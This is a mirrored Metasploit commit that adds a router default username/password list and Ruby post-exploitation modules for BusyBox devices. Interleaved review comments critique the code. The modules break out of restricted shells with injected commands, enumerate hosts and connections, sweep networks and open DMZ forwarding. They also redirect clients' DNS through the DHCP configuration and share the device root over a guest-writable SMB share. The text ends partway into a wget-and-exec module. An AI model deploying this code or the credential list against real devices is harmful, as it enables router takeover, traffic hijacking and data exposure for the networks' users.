mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-29 18:07:27 +01:00
Added modules to jailbreak and remotely control BusyBox-based devices. Also added a word list with default credentials typically used by commercial routers.
parent
a611fff7bf
commit
5ff61ca5f3
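--- a/data/wordlists/routers_userpass.txt
+++ b/data/wordlists/routers_userpass.txt
@@ -0,0 +1,398 @@
+debug synnet
+tech tech
+adminttd adminttd
+admin comcomcom
+admin admin
+admin synnet
+monitor monitor
+manager manager
+admin password
+User Password
+Administrator admin
+security security
+3comcso RIP000
+recovery recovery
+volition volition
+Administrator 3ware
+sysadm anicust
+Admin admin
+none 0
+admin secure
+kermit kermit
+dhs3mt dhs3mt
+at4400 at4400
+mtch mtch
+mtcl mtcl
+root letacla
+dhs3pms dhs3pms
+adfexc adfexc
+client client
+install llatsni
+halt tlah
+admin switch
+diag switch
+root permit
+ftp_inst pbxk1064
+ftp_admi kilo1987
+ftp_oper help1954
+ftp_nmc tuxalize
+manager friend
+manager admin
+Manager friend
+none admin
+admin linga
+root root
+user user
+admin cableroot
+acc acc
+device device
+apc apc
+root admin
+root alpine
+admin 0
+IntraSwitch Asante
+IntraStack Asante
+admin asante
+readonly lucenttech2
+root ascend
+admin epicrouter
+customer none
+DTA TJM
+admin atlantis
+root ROOT500
+diag danger
+manuf xxyyzz
+craft crftpw
+root cms500
+dadmin dadmin01
+root pass
+admin bintec
+admin articon
+patrol patrol
+webadmin webadmin
+installer installer
+root fivranne
+admin 1234
+mediator mediator
+root Mau'dib
+cellit cellit
+admin diamond
+cmaker cmaker
+admin changeme
+netrangr attack
+bbsd-client changeme2
+bbsd-client NULL
+Administrator changeme
+root attack
+admin default
+Cisco Cisco
+admin cisco
+root blender
+hsa hsadb
+wlse wlsedb
+root Cisco
+admin system
+user tivonpw
+cisco cisco
+administrator administrator
+user user
+operator operator
+user public
+PFCUser 240653C9467E45
+corecess corecess
+cgadmin cgadmin
+super surt
+root tslinux
+D-Link D-Link
+root tini
+anonymous any@
+root davox
+davox davox
+MDaemon MServer
+root calvin
+admin my_DEMARC
+PBX PBX
+NETWORK NETWORK
+admin michelangelo
+user password
+draytek 1234
+admin 123
+login admin
+login password
+admin netadmin
+tiger tiger123
+websecadm changeme
+netman netman
+1111 1111
+supervisor supervisor
+anonymous Exabyte
+root default
+admin radius
+admin isee
+MGR HPP187
+MGR HPP189
+MGR HPP196
+MGR INTX3
+MGR ITF3000
+MGR NETBASE
+MGR REGO
+MGR RJE
+MGR CONV
+OPERATOR SYS
+OPERATOR DISC
+OPERATOR SYSTEM
+OPERATOR SUPPORT
+OPERATOR COGNOS
+PCUSER SYS
+RSBCMON SYS
+SPOOLMAN HPOFFICE
+WP HPOFFICE
+ADVMAIL HPOFFICE DATA
+ADVMAIL HP
+FIELD SUPPORT
+FIELD MGR
+FIELD SERVICE
+FIELD MANAGER
+FIELD HPP187 SYS
+FIELD LOTUS
+FIELD HPWORD PUB
+FIELD HPONLY
+HELLO MANAGER.SYS
+HELLO MGR.SYS
+HELLO FIELD.SUPPORT
+HELLO OP.OPERATOR
+MAIL MAIL
+MAIL REMOTE
+MAIL TELESUP
+MAIL HPOFFICE
+MAIL MPE
+MANAGER TCH
+MANAGER SYS
+MANAGER SECURITY
+MANAGER ITF3000
+MANAGER HPOFFICE
+MANAGER COGNOS
+MANAGER TELESUP
+MGR SYS
+MGR CAROLIAN
+MGR VESOFT
+MGR XLSERVER
+MGR SECURITY
+MGR TELESUP
+MGR HPDESK
+MGR CCC
+MGR CNAS
+MGR WORD
+MGR COGNOS
+MGR ROBELLE
+MGR HPOFFICE
+MGR HPONLY
+admin hp.com
+storwatch specialist
+vt100 public
+superadmin secret
+hscroot abc123
+USERID PASSW0RD
+Administrator pilou
+Administrator letmein
+NICONEX NICONEX
+setup setup
+intel intel
+admin hello
+admin giraff
+SYSDBA masterkey
+intermec intermec
+operator $chwarzepumpe
+system sys
+admin operator
+admin ironport
+JDE JDE
+PRODDTA PRODDTA
+netscreen netscreen
+superuser 123456
+admin 123456
+sysadmin PASS
+login access
+comcast 1234
+setup changeme
+setup changeme!
+super super
+xxx cascade
+admin Ascend
+readwrite lucenttech1
+LUCENT01 UI-PSWD-01
+LUCENT02 UI-PSWD-02
+admin AitbISP4eCiG
+bciim bciimpw
+bcim bcimpw
+bcms bcmspw
+bcnas bcnaspw
+blue bluepw
+browse browsepw
+browse looker
+craft craft
+craft craftpw
+cust custpw
+enquiry enquirypw
+field support
+inads indspw
+inads inads
+init initpw
+locate locatepw
+maint maintpw
+maint rwmaint
+nms nmspw
+rcust rcustpw
+support supportpw
+tech field
+scmadmin scmchangeme
+Administrator password
+MICRO RSX
+service smile
+system password
+cablecom router
+admin motorola
+router router
+SYSADM sysadm
+admin admin123
+GlobalAdmin GlobalAdmin
+super 5777364
+superman 21241036
+naadmin naadmin
+netopia netopia
+admin noway
+admin NetCache
+e500 e500changeme
+e250 e250changeme
+guest guest
+admin asd
+vcr NetVCR
+m1122 m1122
+telecom telecom
+disttech 4tas
+maint maint
+mlusr mlusr
+admin root
+l2 l2
+l3 l3
+ro ro
+rw rw
+rwa rwa
+admin setup
+login 0
+login 1111
+login 8429
+spcl 0
+root 3ep5w2u
+maint ntacdmax
+ccrusr ccrusr
+supervisor PlsChgMe!
+266344 266344
+supervisor PlsChgMe1
+admin adslolitec
+admin OCS
+adminstat OCS
+adminview OCS
+adminuser OCS
+helpdesk OCS
+sys uplink
+cac_admin cacadmin
+system sys
+manager change_on_install
+admin kont2004
+Manager Manager
+sysadm sysadm
+write private
+debug d.e.b.u.g
+echo echo
+PSEAdmin $secure$
+admin superuser
+admin mu
+admin microbusiness
+admin smallbusiness
+Polycom SpIp
+support h179350
+lp lp
+radware radware
+wradmin trancell
+piranha q
+piranha piranha
+sysadmin password
+setup changeme
+teacher password
+temp1 password
+admin rmnetlm
+admin2 changeme
+adminstrator changeme
+deskalt password
+deskman changeme
+desknorm password
+deskres password
+replicator replicator
+RMUser1 password
+topicalt password
+topicnorm password
+topicres password
+root 1234
+public public
+admin w2402
+GEN1 gen1
+GEN2 gen2
+ADMN admn
+eng engineer
+op op
+op operator
+su super
+poll tech
+sysadmin sysadmin
+admin pwp
+superuser admin
+admin hagpolm1
+Administrator ganteng
+Administrator smcadmin
+admin barricade
+smc smcadmin
+admin smcadmin
+cusadmin highspeed
+1.79 + Multi
+aaa often blank
+admin Protector
+admin conexant
+admin xad$l#12
+root changeme
+Sweex Mysweex
+target password
+install secret
+super.super master
+xbox xbox
+telco telco
+tellabs tellabs#1
+root admin_1
+tiara tiaranet
+superman talent
+admin extendnet
+root 12345
+cablemodem robotics
+NAU NAU
+ADMINISTRATOR ADMINISTRATOR
+HTTP HTTP
+Any 12345
+support support
+VTech VTech
+admin visual
+root 123456
+CSG SESAME
+user pass
+admin sysAdmin
+root wyse
+VNC winterm
+rapport r@p8p0r+
+1502 1502
+xd xd
+admin 2222
+admin 22222
+admin 1111
+admin zoomadsl
+ZXDSL ZXDSL
+1234 1234
+webadmin 1234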
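Review bot: Several entries in this list do not fit the one-user, one-password shape the rest of the file uses: `ADVMAIL HPOFFICE DATA`, `FIELD HPP187 SYS`, `FIELD HPWORD PUB`, `1.79 + Multi` and `aaa often blank`. The last two look like leftovers from a source table rather than credentials. A reader that splits each line on the first space would presumably take the remainder as the password, so these lines should be corrected or dropped. The file also repeats pairs (`user user`, `system sys`, `setup changeme`) and contains what looks like a misspelling, `adminstrator changeme`. A de-duplicated list with a header comment naming its source would be easier to audit.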
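--- a/modules/post/linux/gather/busybox_enum_connections.rb
+++ b/modules/post/linux/gather/busybox_enum_connections.rb
@@ -0,0 +1,68 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Post
+
+include Msf::Post::File
+
+def initialize
+super(
+'Name' => 'BusyBox Enumerate Connections',
+'Description' => 'This module will be applied on a session connected
+to a BusyBox sh shell. The script will enumerate
+the connections established by the hosts connected
+to the router or device executing BusyBox.',
+'Author' => 'Javier Vicente Vallejo',
+'License' => MSF_LICENSE,
+'References' =>
+[
+[ 'URL', 'http://vallejo.cc']
+],
+'Platform' => ['linux'],
+'SessionTypes' => ['shell']
+)
+end
+
+
+
+def run
+found = false
+conns_files =[
+"/proc/net/nf_conntrack", "/proc/net/ip_conntrack", "/proc/net/tcp", "/proc/net/udp", "/proc/net/arp", "/proc/fcache/*"
+]
+vprint_status("Searching for files that store information about network connections.")
+conns_files.each do |conns_file|
+if file_exists(conns_file)
+found = true
+print_good("Connections File found: #{conns_file}.")
+begin
+str_file=read_file(conns_file)
+vprint_line(str_file)
+#Store file
+p = store_loot("Connections", "text/plain", session, str_file, conns_file, "BusyBox Device Network Established Connections")
+print_good("Connections saved to #{p}.")
+rescue EOFError
+# If there's nothing in the file, we hit EOFError
+print_error("Nothing read from file #{conns_file}, file may be empty.")
+end
+end
+end
+if found == false
+print_error("Nothing read from connection files, files may be empty.")
+end
+end
+
+#file? doesnt work because test -f is not implemented in busybox
+def file_exists(file_path)
+s = read_file(file_path)
+if s and s.length
+return true
+end
+return false
+end
+
+end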
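Review bot: `file_exists` cannot return false for any string result, because `if s and s.length` tests an Integer and `0` is truthy in Ruby. An empty read is therefore reported as an existing file, and `run` prints `Connections File found` and stores empty loot for it. The check should be `return false if s.nil? || s.empty?`, assuming `read_file` yields `""` or `nil` for a missing path, which this page does not show. The same helper is copied verbatim into busybox_enum_hosts.rb, busybox_setdns.rb and busybox_wgetandexec.rb, so the fix belongs in one shared mixin rather than four copies. Each hit is also read twice over the session, once in `file_exists` and again in `run`; returning the content from the probe would avoid the second read.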
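--- a/modules/post/linux/gather/busybox_enum_hosts.rb
+++ b/modules/post/linux/gather/busybox_enum_hosts.rb
@@ -0,0 +1,63 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Post
+
+include Msf::Post::File
+
+def initialize
+super(
+'Name' => 'BusyBox Enumerate Hosts',
+'Description' => 'This module will be applied on a session connected
+to a BusyBox sh shell. The script will enumerate
+the hosts connected to the router or device executing
+BusyBox.',
+'Author' => 'Javier Vicente Vallejo',
+'License' => MSF_LICENSE,
+'References' =>
+[
+[ 'URL', 'http://vallejo.cc']
+],
+'Platform' => ['linux'],
+'SessionTypes' => ['shell']
+)
+end
+
+def run
+hosts_file = nil
+if file_exists("/var/hosts")
+hosts_file = "/var/hosts"
+elsif file_exists("/var/udhcpd/udhcpd.leases")
+hosts_file = "/var/udhcpd/udhcpd.leases"
+else
+vprint_error("Files not found: /var/hosts, /var/udhcpd/udhcpd.leases.")
+return
+end
+#File exists
+begin
+str_file=read_file(hosts_file)
+print_good("Hosts File found: #{hosts_file}.")
+vprint_line(str_file)
+#Store file
+p = store_loot("Hosts", "text/plain", session, str_file, hosts_file, "BusyBox Device Connected Hosts")
+print_good("Hosts saved to #{p}.")
+rescue EOFError
+# If there's nothing in the file, we hit EOFError
+print_error("Nothing read from file: #{hosts_file}, file may be empty.")
+end
+end
+
+#file? doesnt work because test -f is not implemented in busybox
+def file_exists(file_path)
+s = read_file(file_path)
+if s and s.length
+return true
+end
+return false
+end
+
+end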
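Review bot: In `run`, `print_good("Hosts File found: ...")` and `store_loot` are reached without checking that `str_file` holds anything, so an empty or nil second read is still stored and reported as a result. The only guard is `rescue EOFError`, and nothing on this page shows that `read_file` on a shell session raises it. A guard such as `return print_error("Nothing read from file: #{hosts_file}, file may be empty.") if str_file.nil? || str_file.empty?` before the first `print_good` would make the outcome explicit. The local `p` shadows `Kernel#p`; `loot_path` reads better.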
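--- a/modules/post/linux/gather/busybox_pingnet.rb
+++ b/modules/post/linux/gather/busybox_pingnet.rb
@@ -0,0 +1,165 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Post
+
+include Msf::Post::File
+
+def initialize
+super(
+'Name' => 'BusyBox Ping Network',
+'Description' => 'This module will be applied on a session connected
+to a BusyBox sh shell. The script will ping a range of
+ip adresses from the router or device executing BusyBox.',
+'Author' => 'Javier Vicente Vallejo',
+'License' => MSF_LICENSE,
+'References' =>
+[
+[ 'URL', 'http://vallejo.cc']
+],
+'Platform' => ['linux'],
+'SessionTypes' => ['shell']
+)
+
+register_options(
+[
+OptAddress.new('IPRANGESTART', [ true, "The first ip address of the range to ping.", nil ]),
+OptAddress.new('IPRANGEEND', [ true, "The last ip address of the range to ping.", nil ])
+], self.class)
+
+end
+
+def run
+
+#this module will send a sh script for busybox shell for doing ping to a range of ip address from
+#the router or device that is executing busybox. It could be possible to calculate each ip address
+#of the range of ip addresses in the ruby script and execute each ping command with cmd_exec, but
+#it would generate an unnecesary traffic in the connection with the busybox device (usually telnet)
+
+sh_script_lines=[
+"#!/bin/sh",
+"param1=#{datastore['IPRANGESTART']}",
+"param2=#{datastore['IPRANGEEND']}",
+"while true;",
+" param1cpy=\"$param1\"",
+" pos=`expr index \"$param1cpy\" \".\"`",
+" pos=`expr $pos - 1`",
+" octec1=`expr substr \"$param1cpy\" 1 $pos`",
+" pos=`expr $pos + 2`",
+" len=`expr length \"$param1cpy\"`",
+" param1cpy=`expr substr \"$param1cpy\" $pos $len`",
+" pos=`expr index \"$param1cpy\" \".\"`",
+" pos=`expr $pos - 1`",
+" octec2=`expr substr \"$param1cpy\" 1 $pos`",
+" pos=`expr $pos + 2`",
+" len=`expr length \"$param1cpy\"`",
+" param1cpy=`expr substr \"$param1cpy\" $pos $len`",
+" pos=`expr index \"$param1cpy\" \".\"`",
+" pos=`expr $pos - 1`",
+" octec3=`expr substr \"$param1cpy\" 1 $pos`",
+" pos=`expr $pos + 2`",
+" len=`expr length \"$param1cpy\"`",
+" param1cpy=`expr substr \"$param1cpy\" $pos $len`",
+" octec4=\"$param1cpy\"",
+" carry=0",
+" len=`expr length \"$octec4\"`",
+" temp=`expr match \"$octec4\" \"255\"`",
+" if [ $temp -eq $len ]; then",
+" octec4=0",
+" carry=1",
+" else",
+" octec4=`expr $octec4 + 1`",
+" fi",
+" if [ $carry -eq 1 ]; then",
+" carry=0",
+" len=`expr length \"$octec3\"`",
+" temp=`expr match \"$octec3\" \"255\"`",
+" if [ $temp -eq $len ]; then",
+" octec3=0",
+" carry=1",
+" else",
+" octec3=`expr \"$octec3\" + 1`",
+" fi",
+" fi",
+" if [ $carry -eq 1 ]; then",
+" carry=0",
+" len=`expr length \"$octec2\"`",
+" temp=`expr match \"$octec2\" \"255\"`",
+" if [ $temp -eq $len ]; then",
+" octec2=0",
+" carry=1",
+" else",
+" octec2=`expr $octec2 + 1`",
+" fi",
+" fi",
+" if [ $carry -eq 1 ]; then",
+" carry=0",
+" len=`expr length \"$octec1\"`",
+" temp=`expr match \"$octec1\" \"255\"`",
+" if [ $temp -eq $len ]; then",
+" octec1=0",
+" carry=1",
+" else",
+" octec1=`expr $octec1 + 1`",
+" fi",
+" fi",
+" ping -c 1 \"$param1\"",
+" param1=\"$octec1\"\".\"\"$octec2\"\".\"\"$octec3\"\".\"\"$octec4\"",
+" temp=`expr match \"$param1\" \"$param2\"`",
+" len=`expr length \"$param2\"`",
+" if [ $temp -eq $len ]; then",
+" ping -c 1 \"$param1\"",
+" break",
+" fi",
+"done"
+]
+
+begin
+#send script and receive echos
+count=0
+sh_script_lines.each do |sh_script_line|
+session.shell_write(sh_script_line + "\n")
+count+=1
+result=session.shell_read() #receive echos
+vprint_status(result)
+Rex::sleep(0.03)
+end
+rescue
+print_error("Problems were found while sending script to the BusyBox device.")
+return
+end
+Rex::sleep(1.00)
+
+full_results = ""
+begin
+#receiving ping results
+count=0
+print_status("Script has been sent to the busybox device. Doing ping to the range of addresses.")
+while count<15 #we stop when we have been 15 seconds without receiving responses
+result = session.shell_read()
+if result.length>0
+count=0
+print_status(result)
+full_results << result
+else
+vprint_status("No response.")
+count+=1
+end
+Rex::sleep(1.00)
+end
+rescue
+print_warning("Problems were found while receiving ping results. Probably remote device terminated the connection.\nResults that were already received will be kept.")
+end
+
+#storing results
+
+p = store_loot("Pingnet", "text/plain", session, full_results, "#{datastore['IPRANGESTART']}"+"-"+"#{datastore['IPRANGEEND']}", "BusyBox Device Network Range Pings")
+print_good("Pingnet results saved to #{p}.")
+
+end
+
+end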
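Review bot: The generated script opens its loop with `"while true;"` and closes it with `"done"` but never emits `do`, so as shown the remote shell would reject it as a syntax error; the line should read `"while true; do",`. `run` also sends the script without checking that IPRANGESTART is not above IPRANGEEND. Because the carry logic wraps 255 to 0, a reversed range would walk far outside the intended addresses before reaching the end value, so the two should be compared in Ruby first, with a `print_error` and `return` on failure. Both bare `rescue` clauses discard the exception; `rescue ::StandardError => e` with `e.message` in the output would show why the session failed. `store_loot` runs even when `full_results` is empty, which records a result for a run that produced none.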
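--- a/modules/post/linux/manage/busybox_jailbreak.rb
+++ b/modules/post/linux/manage/busybox_jailbreak.rb
@@ -0,0 +1,64 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Post
+
+def initialize
+super(
+'Name' => 'BusyBox Jailbreak ',
+'Description' => 'This module will send a set of commands to a open
+session that is connected to a BusyBox limited shell
+(i.e. a router limited shell). It will try different
+known tricks to try to jailbreak the limited shell and
+get a full sh busybox shell.',
+'Author' => 'Javier Vicente Vallejo',
+'License' => MSF_LICENSE,
+'References' =>
+[
+[ 'URL', 'http://vallejo.cc']
+],
+'Platform' => ['linux'],
+'SessionTypes' => ['shell']
+)
+end
+
+def run
+bfound = false
+bfound = try_command("cat xx || sh\n","1_1") unless bfound
+bfound = try_command("ping || sh\n","1_2") unless bfound
+bfound = try_command("echo `sh >> /dev/ttyp0`\n","2_1") unless bfound
+bfound = try_command("ping `sh >> /dev/ttyp0`\n","2_2") unless bfound
+bfound = try_command("cat `sh >> /dev/ttyp0`\n","2_3") unless bfound
+bfound = try_command("cat xx;sh\n","3_1") unless bfound
+bfound = try_command("echo xx;sh\n","3_2") unless bfound
+bfound = try_command("ping;sh\n","3_3") unless bfound
+bfound = try_command("cat xx | sh\n","4_1") unless bfound
+bfound = try_command("ping | sh\n","4_2") unless bfound
+bfound = try_command("cat ($sh)\n","5_1") unless bfound
+bfound = try_command("echo ($sh) xx\n","5_2") unless bfound
+bfound = try_command("ping ($sh)\n","5_3") unless bfound
+bfound = try_command("cat xx && sh\n","6_1") unless bfound
+bfound = try_command("echo xx && sh\n","6_2") unless bfound
+bfound = try_command("ping && sh\n","3_3") unless bfound
+print_error("Unable to jailbreak device shell.") if !bfound
+end
+
+def try_command(param_command, method_number)
+vprint_status("jailbreak sent: #{param_command}.")
+session.shell_write(param_command)
+(1..10).each do
+resp = session.shell_read()
+vprint_status("jailbreak received: #{resp}.")
+if ((resp.include? "BusyBox") && (resp.include? "Built-in shell"))
+vprint_status("Done method " + method_number + ".")
+return true
+end
+end
+return false
+end
+
+end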
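Review bot: The last call in `run`, `try_command("ping && sh\n","3_3")`, reuses the label of the earlier `ping;sh` attempt, so the verbose `Done method 3_3.` line cannot tell the two apart in a session log; by the numbering of its neighbours it should be `"6_3"`. In `try_command`, `resp.include?` is called on whatever `session.shell_read()` returns, so a nil read (assumed possible on a timeout; not shown here) would raise NoMethodError; `resp = session.shell_read().to_s` avoids that. The module prints nothing outside verbose mode when it succeeds, only `print_error` when it fails, so a `print_good` on success would make the state change visible. The `'Name'` value carries a trailing space.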
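--- a/modules/post/linux/manage/busybox_setdmz.rb
+++ b/modules/post/linux/manage/busybox_setdmz.rb
@@ -0,0 +1,49 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Post
+
+def initialize
+super(
+'Name' => 'BusyBox Set Dmz',
+'Description' => 'This module will be applied on a session connected
+to a BusyBox sh shell. The script will enable or disable dmz
+to a network host in the router or device executing BusyBox.',
+'Author' => 'Javier Vicente Vallejo',
+'License' => MSF_LICENSE,
+'References' =>
+[
+[ 'URL', 'http://vallejo.cc']
+],
+'Platform' => ['linux'],
+'SessionTypes' => ['shell']
+)
+
+register_options([
+OptAddress.new('TARGETHOST', [ true, "The address of the host to be target for the dmz", nil ]),
+OptBool.new('DELETE', [false, "If this option is set to true, the DMZ is removed. Else it is added.", false])
+], self.class)
+
+end
+
+def run
+
+if datastore['DELETE'] == true
+vprint_status("Executing iptables to delete dmz.")
+vprint_status(cmd_exec("iptables -D FORWARD -d #{datastore['TARGETHOST']} -j ACCEPT"))
+else
+vprint_status("Executing iptables to add dmz.")
+vprint_status(cmd_exec("iptables -A FORWARD -d #{datastore['TARGETHOST']} -j ACCEPT"))
+end
+if datastore['VERBOSE']
+vprint_status(cmd_exec("iptables --list"))
+end
+print_good("Dmz modified. Enable verbose for additional information.")
+
+end
+
+end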
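Review bot: `run` prints `Dmz modified.` unconditionally, without looking at what either `iptables` call returned, so a rejected or failed rule change is still reported as success. Keeping the `cmd_exec` result in a local and calling `print_error` with it when it is non-empty would fix that, on the assumption that iptables stays silent on success. The description should also state that the module edits the device's FORWARD chain and that running it again with `DELETE` set is the way to revert, so the rule is not left behind after a test. `datastore['DELETE'] == true` can simply be `datastore['DELETE']`.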
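--- a/modules/post/linux/manage/busybox_setdns.rb
+++ b/modules/post/linux/manage/busybox_setdns.rb
@@ -0,0 +1,124 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Post
+
+include Msf::Post::File
+
+def initialize
+super(
+'Name' => 'BusyBox Set Dns',
+'Description' => 'This module will be applied on a session connected
+to a BusyBox sh shell. The script will set dns addresses
+to the router or device executing BusyBox to be sent
+by dhcp server to network hosts.',
+'Author' => 'Javier Vicente Vallejo',
+'License' => MSF_LICENSE,
+'References' =>
+[
+[ 'URL', 'http://vallejo.cc']
+],
+'Platform' => ['linux'],
+'SessionTypes' => ['shell']
+)
+
+register_options(
+[
+OptAddress.new('SRVHOST', [ true, "The dns server address.", nil ])
+], self.class)
+
+end
+
+#The module tries to update resolv.conf file with the SRVHOST dns address. It tries to update
+#udhcpd.conf too, with SRVHOST dns address, that should be given to network's hosts via dhcp
+
+def run
+
+workdone = false
+vprint_status("Searching for files to modify dns server.")
+if file_exists("/etc/resolv.conf")
+vprint_status("Resolv.conf found.")
+if is_writable_and_write("/etc/resolv.conf", "nameserver #{datastore['SRVHOST']}", false)
+print_good("Dns server added to resolv.conf.")
+workdone = true
+end
+end
+if file_exists("/etc/udhcpd.conf")
+vprint_status("Udhcpd.conf found.")
+original_content = read_file("/etc/udhcpd.conf")
+vprint_status("Original udhcpd.conf content:")
+vprint_status(original_content)
+if is_writable_and_write("/etc/udhcpd.conf", "option dns #{datastore['SRVHOST']}", false)
+vprint_status("Udhcpd.conf is writable.")
+is_writable_and_write("/etc/udhcpd.conf", original_content, true)
+vprint_status("Relaunching udhcp server:")
+cmd_exec("killall dhcpd\n")
+cmd_exec("dhcpd /etc/udhcpd.conf &\n")
+print_good("Udhcpd.conf modified and dns server added. Dhcpd restarted.")
+else
+vprint_status("Unable to write udhcpd.conf. Trying to copy the file to a writable directory.")
+writable_directory = nil
+vprint_.status("Trying to find writable directory.")
+writable_directory = "/etc/" if is_writable_and_write("/etc/tmp.conf", "x", false)
+writable_directory = "/mnt/" if (!writable_directory && is_writable_and_write("/mnt/tmp.conf", "x", false))
+writable_directory = "/var/" if (!writable_directory && is_writable_and_write("/var/tmp.conf", "x", false))
+writable_directory = "/var/tmp/" if (!writable_directory && is_writable_and_write("/var/tmp/tmp.conf", "x", false))
+if writable_directory
+vprint_status("writable directory found, creating a copy of the original udhcpd.conf.")
+is_writable_and_write("#{writable_directory}tmp.conf", "option dns #{datastore['SRVHOST']}", false)
+is_writable_and_write("#{writable_directory}tmp.conf", original_content, true)
+vprint_status("Relaunching udhcp server:")
+cmd_exec("killall dhcpd\n")
+cmd_exec("dhcpd #{writable_directory}tmp.conf &\n")
+print_good("Udhcpd.conf copied to writable directory and dns server added. Dhcpd restarted.")
+workdone = true
+else
+vprint_error("Writable directory not found.")
+end
+end
+end
+if !workdone
+print_error("Unable to modify dns server.")
+end
+
+end
+
+#This function checks if the target file is writable and writes or append the data given as parameter.
+#BusyBox shell's commands are limited and Msf > Post > File > write_file function doesnt work here, for
+#this reason it is necessary to implement an specific function
+
+def is_writable_and_write(file_path, data, append)
+if append
+data = read_file(file_path) + "\n" + data
+end
+rand_str = ""; 16.times{rand_str << (65 + rand(25)).chr}
+session.shell_write("echo #{rand_str} > #{file_path}\n"); Rex::sleep(0.1)
+session.shell_read(); Rex::sleep(0.1)
+if read_file(file_path).include? rand_str
+session.shell_write("echo \"\"> #{file_path}\n"); Rex::sleep(0.1)
+session.shell_read(); Rex::sleep(0.1)
+lines = data.lines.map(&:chomp)
+lines.each do |line|
+session.shell_write("echo #{line.chomp} >> #{file_path}\n"); Rex::sleep(0.1)
+session.shell_read(); Rex::sleep(0.1)
+end
+return true
+else
+return false
+end
+end
+
+#file? doesnt work because test -f is not implemented in busybox
+def file_exists(file_path)
+s = read_file(file_path)
+if s and s.length
+return true
+end
+return false
+end
+
+end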
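Review bot: `vprint_.status("Trying to find writable directory.")` in the fallback branch of `run` is a typo for `vprint_status(...)` and raises NameError as soon as udhcpd.conf is not writable, so the copy-to-writable-directory path can never run. The branch where udhcpd.conf is writable never sets `workdone = true`, so a successful change can still end with `Unable to modify dns server.`. `is_writable_and_write` tests writability by overwriting the target with a random string, and for /etc/resolv.conf the previous content is never put back. The rewritten lines are also sent as unquoted `echo #{line.chomp}`, so the remote shell would interpret `#`, `;` or `*` in a saved line and the restored udhcpd.conf could differ from the original. Storing the original content with `store_loot` before the first write and single-quoting each echoed line would keep the change recoverable.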
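--- a/modules/post/linux/manage/busybox_smb_share_root.rb
+++ b/modules/post/linux/manage/busybox_smb_share_root.rb
@@ -0,0 +1,74 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Post
+
+include Msf::Post::File
+
+def initialize
+super(
+'Name' => 'BusyBox Smb Share Root',
+'Description' => 'This module will be applied on a session connected
+to a BusyBox sh shell. The script will modify the
+smb configuration of the the router or device executing
+BusyBox to share the root directory of the device.',
+'Author' => 'Javier Vicente Vallejo',
+'License' => MSF_LICENSE,
+'References' =>
+[
+[ 'URL', 'http://vallejo.cc']
+],
+'Platform' => ['linux'],
+'SessionTypes' => ['shell']
+)
+
+end
+
+def run
+vprint_status("Trying to find smb.conf.")
+if read_file("/var/samba/smb.conf").length > 0 #file? doesnt work because test -f is not implemented in busybox
+vprint_status("Smb.conf found.")
+vprint_status("Trying to find writable directory.")
+writable_directory = nil
+writable_directory = "/etc/" if is_writable_directory("/etc")
+writable_directory = "/mnt/" if (!writable_directory && is_writable_directory("/mnt"))
+writable_directory = "/var/" if (!writable_directory && is_writable_directory("/var"))
+writable_directory = "/var/tmp/" if (!writable_directory && is_writable_directory("/var/tmp"))
+if writable_directory
+vprint_status("writable directory found, copying smb.conf.")
+vprint_status(cmd_exec("rm -f #{writable_directory}smb.conf")); Rex::sleep(0.1)
+vprint_status(cmd_exec("cp -f /var/samba/smb.conf #{writable_directory}smb.conf")); Rex::sleep(0.1)
+vprint_status(cmd_exec("echo -e '[rootdir]\ncomment = rootdir\npath = /\nbrowseable = yes\nwriteable = yes\nguest ok = yes\n' >> #{writable_directory}smb.conf")); Rex::sleep(0.1)
+vprint_status(cmd_exec("killall smbd")); Rex::sleep(0.1)
+vprint_status(cmd_exec("smbd -D -s #{writable_directory}smb.conf")); Rex::sleep(0.1)
+vprint_status(cmd_exec("smbd -D -s=#{writable_directory}smb.conf")); Rex::sleep(0.1)
+print_good("Smb configuration has been modified.")
+else
+print_error("Writable directory not found.")
+end
+else
+print_error("Smb.conf not found.")
+end
+end
+
+#This function checks if the target directory is writable
+def is_writable_directory(directory_path)
+retval = false
+rand_str = ""; 16.times{rand_str << (65 + rand(25)).chr}
+file_path = directory_path + "/" + rand_str
+session.shell_write("echo #{rand_str}XXX#{rand_str} > #{file_path}\n"); Rex::sleep(0.1)
+(1..5).each{session.shell_read(); Rex::sleep(0.1)}
+rcv = read_file(file_path)
+vprint_status("is_writable_directory:"+rcv)
+if rcv.include? (rand_str+"XXX"+rand_str)
+retval = true
+end
+cmd_exec("rm -f #{file_path}"); Rex::sleep(0.1)
+return retval
+end
+
+end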
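Review bot: `run` calls `read_file("/var/samba/smb.conf").length` directly, and `is_writable_directory` concatenates `rcv` into a string, so a nil from `read_file` (assumed possible on a failed read; not shown here) raises instead of reaching `Smb.conf not found.`; `read_file(...).to_s` in both places avoids that. `smbd` is started twice with two spellings of one option, `-s path` and `-s=path`, which needs a comment saying why, and `Smb configuration has been modified.` is printed without checking the output of either start. `is_writable_directory` is duplicated verbatim in busybox_wgetandexec.rb and belongs in one shared mixin. The module leaves a guest-writable share of `/` on the device with no revert option, which the description should state so the change is tracked and undone after a test.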
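--- a/modules/post/linux/manage/busybox_wgetandexec.rb
+++ b/modules/post/linux/manage/busybox_wgetandexec.rb
@@ -0,0 +1,89 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Post
+
+include Msf::Post::File
+
+def initialize
+super(
+'Name' => 'BusyBox Wget and Exec',
+'Description' => 'This module will be applied on a session connected
+to a BusyBox sh shell. The script will use wget to download
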